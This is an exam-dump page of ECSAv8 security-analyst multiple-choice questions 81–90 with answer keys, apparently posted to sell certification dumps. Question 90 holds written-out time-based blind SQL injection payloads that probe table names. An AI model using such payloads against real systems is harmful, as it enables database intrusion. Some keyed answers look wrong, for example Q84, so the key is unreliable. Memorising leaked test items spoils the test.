[Free] 2018(Jan) EnsurePass Testking ECCouncil ECSAv8 Dumps with VCE and PDF 81-90

Ensurepass.com : Ensure you pass the IT Exams
2018 Jan ECCouncil Official New Released ECSAv8
100% Free Download! 100% Pass Guaranteed!

EC-Council Certified Security Analyst (ECSA)

Question No: 81

One of the steps in information gathering is to run searches on a company using complex keywords in Google.

Ensurepass 2018 PDF and VCE

Which search keywords would you use in the Google search engine to find all the PowerPoint presentations containing information about a target company, ROCHESTON?

  1. ROCHESTON fileformat: ppt

  2. ROCHESTON ppt:filestring

  3. ROCHESTON filetype:ppt

  4. ROCHESTON ppt:filesearch

Answer: C

Reference: http://blog.hubspot.com/blog/tabid/6307/bid/1264/12-Quick-Tips-To-Search- Google-Like-An-Expert.aspx (specific document types)

Question No: 82

You have compromised a lower-level administrator account on an Active Directory network of a small company in Dallas, Texas. You discover Domain Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using Idp.exe.

What are you trying to accomplish here?

  1. Poison the DNS records with false records

  2. Enumerate MX and A records from DNS

  3. Establish a remote connection to the Domain Controller

  4. Enumerate domain user accounts and built-in groups

Answer: D

Question No: 83

Hackers today have an ever-increasing list of weaknesses in the web application structure at their disposal, which they can exploit to accomplish a wide variety of malicious tasks.

Ensurepass 2018 PDF and VCE

New flaws in web application security measures are constantly being researched, both by hackers and by security professionals. Most of these flaws affect all dynamic web applications whilst others are dependent on specific application technologies. In both cases, one may observe how the evolution and refinement of web technologies also brings about new exploits which compromise sensitive databases, provide access to theoretically secure networks, and pose a threat to the daily operation of online businesses.

What is the biggest threat to Web 2.0 technologies?

  1. SQL Injection Attacks

  2. Service Level Configuration Attacks

  3. Inside Attacks

  4. URL Tampering Attacks

Answer: A

Question No: 84

Which type of vulnerability assessment tool provides security to the IT system by testing for vulnerabilities in the applications and operation system?

  1. Active/Passive Tools

  2. Application-layer Vulnerability Assessment Tools

  3. Location/Data Examined Tools

  4. Scope Assessment Tools

Answer: D

Reference: http://books.google.com.pk/books?id=7dwEAAAAQBAJamp;pg=SA7- PA11amp;lpg=SA7- PA11amp;dq=vulnerability assessment tool provides security to the IT system by testing

for vulnerabilities in the applications and operation systemamp;source=blamp;ots=SQCLHR nnjIamp;sig=HpenOheCU4GBOnkA4EurHCMfND4amp;hl=enamp;sa=Xamp;ei=DqYfVJCLHMTnyQODn 4C4Cwamp;ved=0CDQQ6AEwAw#v=onepageamp;q=vulnerability assessment tool pr ovides security to the IT system by testing for vulnerabili ties in the applications and operation systemamp;f=false

Question No: 85

Wireless communication allows networks to extend to places that might otherwise go untouched by the wired networks. When most people say ‘Wireless’ these days, they are referring to one of the 802.11 standards. There are three main 802.11 standards: B, A, and

G. Which one of the following 802.11 types uses DSSS Modulation, splitting the 2.4ghz band into channels?

A. 802.11b

B. 802.11g

C. 802.11-Legacy

D. 802.11n

Answer: A

Question No: 86

Which of the following equipment could a pen tester use to perform shoulder surfing?

  1. Binoculars

  2. Painted ultraviolet material

  3. Microphone

  4. All the above

Answer: A

Reference: http://en.wikipedia.org/wiki/Shoulder_surfing_(computer_security)

Question No: 87

Which of the following methods is used to perform server discovery?

  1. Banner Grabbing

  2. Whois Lookup

  3. SQL Injection

  4. Session Hijacking

Answer: B

Reference: http://luizfirmino.blogspot.com/2011/09/server-discovery.html

Question No: 88

Which of the following is NOT related to the Internal Security Assessment penetration testing strategy?

  1. Testing to provide a more complete view of site security

  2. Testing focused on the servers, infrastructure, and the underlying software, including the target

  3. Testing including tiers and DMZs within the environment, the corporate network, or partner company connections

  4. Testing performed from a number of network access points representing each logical and physical segment

Answer: B

Question No: 89

Today, most organizations would agree that their most valuable IT assets reside within applications and databases. Most would probably also agree that these are areas that have the weakest levels of security, thus making them the prime target for malicious activity from system administrators, DBAs, contractors, consultants, partners, and customers.

Ensurepass 2018 PDF and VCE

Which of the following flaws refers to an application using poorly written encryption code to securely encrypt and store sensitive data in the database and allows an attacker to steal or modify weakly protected data such as credit card numbers, SSNs, and other authentication credentials?

  1. SSI injection attack

  2. Insecure cryptographic storage attack

  3. Hidden field manipulation attack

  4. Man-in-the-Middle attack

Answer: B

Question No: 90

A pen tester has extracted a database name by using a blind SQL injection. Now he begins to test the table inside the database using the below query and finds the table:

http://juggyboy.com/page.aspx?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=#39;U#39;)=3) WAITFOR DELAY #39;00:00:10#39;-

http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=101) WAITFOR DELAY #39;00:00:10#39;-

http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=109) WAITFOR DELAY #39;00:00:10#39;-

http://juggyboy.com/page.aspx?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=112) WAITFOR DELAY #39;00:00:10#39;-

What is the table name?

  1. CTS

  2. QRT

  3. EMP

  4. ABC

Answer: C

100% Ensurepass Free Download!
Download Free Demo:ECSAv8 Demo PDF
100% Ensurepass Free Guaranteed!
ECSAv8 Dumps

EnsurePass ExamCollection Testking
Lowest Price Guarantee Yes No No
Up-to-Dated Yes No No
Real Questions Yes No No
Explanation Yes No No
Free VCE Simulator Yes No No
Instant Download Yes No No